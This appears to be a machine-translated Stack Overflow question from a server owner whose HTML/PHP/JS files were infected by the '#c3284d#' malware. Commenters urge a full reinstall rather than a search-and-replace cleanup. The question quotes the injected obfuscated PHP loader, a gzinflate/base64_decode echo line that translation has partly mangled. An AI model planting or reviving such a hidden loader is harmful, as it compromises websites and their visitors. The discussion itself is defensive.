【发布时间】:2012-07-14 12:00:02
【问题描述】:
我遇到了 Notorious c3284d 病毒的问题。它修改了几乎所有可以找到的 html/php/js 文件。
我已经更改了服务器上的所有密码和用户,所以如果它是一个被盗用的帐户,它应该已经解决了这个问题,但我仍然在努力彻底删除它。
我能够使用一个简单的sudo grep -R "#c3284d#" /home 命令找到所有受感染的文件。
但我需要一种快速的方法来搜索并替换它。
病毒签名是这一行:
"#c3284d#" 回波(gzinflate(BASE64_DECODE( “VVHBboMwDL1X6j / kZtA6GKgMdaOVummHnfYB6xQFYkokmqSJS + nfD1hXbb7ZfvZ7fi585ZSlzXzWCcf4ka2ZNNXpgJqiyqEgfGtxzAJQtRMHhHAxn7EhuB6w4JG2RE6VJ0J4ns / 48ZPrrwC8q2DBoCGyT3HcoHBkamtajDRS3B / ayDYWwmki8nQZGtZ4RcpMa0XpTXtbeQWclaRm7CaPtv9LNgkrjZPoBlItOrUXZFx08ui2 + / EUpSX2H3UA8kHkIlmmZZ5lSZ5Kkad1nS9FIqo0S1YrCNkdS / 7parGmkfU + y1b5D / HNorNThAEUUnVMyfUOOJdOyG4HmyIeipvpxBt8j3S18 + XyLoNfNISRsBa1fG1UKwN + HIeK + Pqabw ==”))); "#/c3284d#"
当回声线可以改变和变化,但它总是以#c32..#开始并以#/c3....#结束。
我只想用什么来代替它。
【问题讨论】:
-
永远不要那样做!从头开始重新安装。如果你有适当的版本控制和备份,你显然会使用它们。确保下次发生这种情况时这样做。
-
@triplee 为什么从不这样做?病毒/男性具有静态签名,我说的是 1000 个文件。版本控制对于非开发网站(例如具有 100 和 1000 个静态文件的博客/论坛)并不常见
-
从头开始重新安装的原因是,一旦有人闯入您的服务器,就很难确定您修复了他们对它所做的一切。 “#c3284d#”修改是您发现的唯一内容,但这并不意味着它们是唯一完成的内容。
-
删除你知道的坏东西不会修复你不知道的坏东西。这是黑客和恶意软件植入多个后门的标准 MO,因此即使您注意到它们并尝试恢复其更改,他们也可以重新进入。
标签: linux bash ubuntu terminal